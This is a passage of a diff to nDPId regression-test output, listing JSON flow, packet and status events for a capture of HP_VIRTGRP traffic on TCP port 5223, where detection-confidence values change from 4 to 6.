{"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614876808445,"flow_last_seen":1614876811615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614876811615,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861892925,"flow_last_seen":1614861898114,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861998723,"flow_last_seen":1614862060713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":61,"packets-processed":60,"total-skipped-flows":0,"total-l4-payload-len":2088,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":28,"global_ts_msec":1614877863379} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614877863379,"flow_last_seen":1614877863379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614877863379,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1614877863379,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614877863379,"pkt":"eJS0JASgYDjgxTWgCABFAAA8nQJAAD8GeT7AqAJkoCzCQpzYFGd4ZLUSAAAAAKAC\/\/8PXgAAAgQFtAQCCAoAcTP+AAAAAAEDAwg="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1614877863406,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614877863406,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnnNj+cl67eGS1E2ASchDErAAAAgQFrAAA"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1614877863410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614877863410,"pkt":"eJS0JASgYDjgxTWgCABFAAAonQNAAD8GeVHAqAJkoCzCQpzYFGd4ZLUT\/nJevFAQ\/\/9OcgAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614877863379,"flow_last_seen":1614877863430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614877863430,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614877863379,"flow_last_seen":1614877863430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614877863430,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":76,"packets-processed":75,"total-skipped-flows":0,"total-l4-payload-len":2866,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1614880256676} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614880256676,"flow_last_seen":1614880256676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614880256676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1614880256676,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614880256676,"pkt":"eJS0JASgYDjgxTWgCABFAAA87gNAAD8GKD3AqAJkoCzCQosyFGf2oDFeAAAAAKAC\/\/9JKQAAAgQFtAQCCAoAlBEuAAAAAAEDAwg="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1614880256703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614880256703,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnizKJqg+b9qAxX2ASchCfswAAAgQFrAAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1614880256708,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614880256708,"pkt":"eJS0JASgYDjgxTWgCABFAAAo7gRAAD8GKFDAqAJkoCzCQosyFGf2oDFfiaoPnFAQ\/\/8peQAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614880256676,"flow_last_seen":1614880256732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614880256732,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614880256676,"flow_last_seen":1614880256732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614880256732,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":91,"packets-processed":90,"total-skipped-flows":0,"total-l4-payload-len":3481,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":6,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1614892184461} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614892184461,"flow_last_seen":1614892184461,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614892184461,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1614892184461,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184461,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7JAAD8Gco7AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/8FAAAAgQFtAQCCAoBLLDpAAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1614892184487,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614892184487,"pkt":"eJS0JASgYDjgxTWgCABFAAA8o7NAAD8Gco3AqAJkoCzCQsKuFGf4RqT8AAAAAKAC\/\/\/4LwAAAgQFtAQCCAoBLLTOAAAAAAEDAwg="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1614892184489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614892184489,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnwq4QVsoE+Eak\/WASchCx3QAAAgQFrAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614892184461,"flow_last_seen":1614892184500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614892184500,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614876808445,"flow_last_seen":1614876926772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614880256676,"flow_last_seen":1614880490568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":615,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614877863379,"flow_last_seen":1614877864559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":778,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614892184461,"flow_last_seen":1614892184500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614892184500,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614876808445,"flow_last_seen":1614876926772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614880256676,"flow_last_seen":1614880490568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":615,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":35634,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614877863379,"flow_last_seen":1614877864559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":778,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1614892185660,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":40152,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":106,"packets-processed":105,"total-skipped-flows":0,"total-l4-payload-len":4061,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":7,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":49,"global_ts_msec":1614894888601} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614894888601,"flow_last_seen":1614894888601,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614894888601,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1614894888601,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614894888601,"pkt":"eJS0JASgYDjgxTWgCABFAAA8czZAAD8GowrAqAJkoCzCQqY4FGfLLz4YAAAAAKAC\/\/+U4AAAAgQFtAQCCAoBVchmAAAAAAEDAwg="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1614894888628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614894888628,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpjjVSzZFyy8+GWASchAxGQAAAgQFrAAA"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1614894888632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614894888632,"pkt":"eJS0JASgYDjgxTWgCABFAAAoczdAAD8Gox3AqAJkoCzCQqY4FGfLLz4Z1Us2RlAQ\/\/+63gAA"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614894888601,"flow_last_seen":1614894888640,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614894888640,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614894888601,"flow_last_seen":1614894888640,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614894888640,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":121,"packets-processed":120,"total-skipped-flows":0,"total-l4-payload-len":4583,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":55,"global_ts_msec":1614898090218} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614898090218,"flow_last_seen":1614898090218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614898090218,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1614898090218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614898090218,"pkt":"eJS0JASgYDjgxTWgCABFAAA8EFJAAD8GBe\/AqAJkoCzCQqcMFGeOCpYjAAAAAKAC\/\/+UDgAAAgQFtAQCCAoBYq1xAAAAAAEDAwg="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1614898090245,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614898090245,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpwwosEHQjgqWJGASchC2bwAAAgQFrAAA"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1614898090249,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614898090249,"pkt":"eJS0JASgYDjgxTWgCABFAAAoEFNAAD8GBgLAqAJkoCzCQqcMFGeOCpYkKLBB0VAQ\/\/9ANQAA"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614898090218,"flow_last_seen":1614898090270,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614898090270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614894888601,"flow_last_seen":1614895277767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614898090218,"flow_last_seen":1614898324173,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 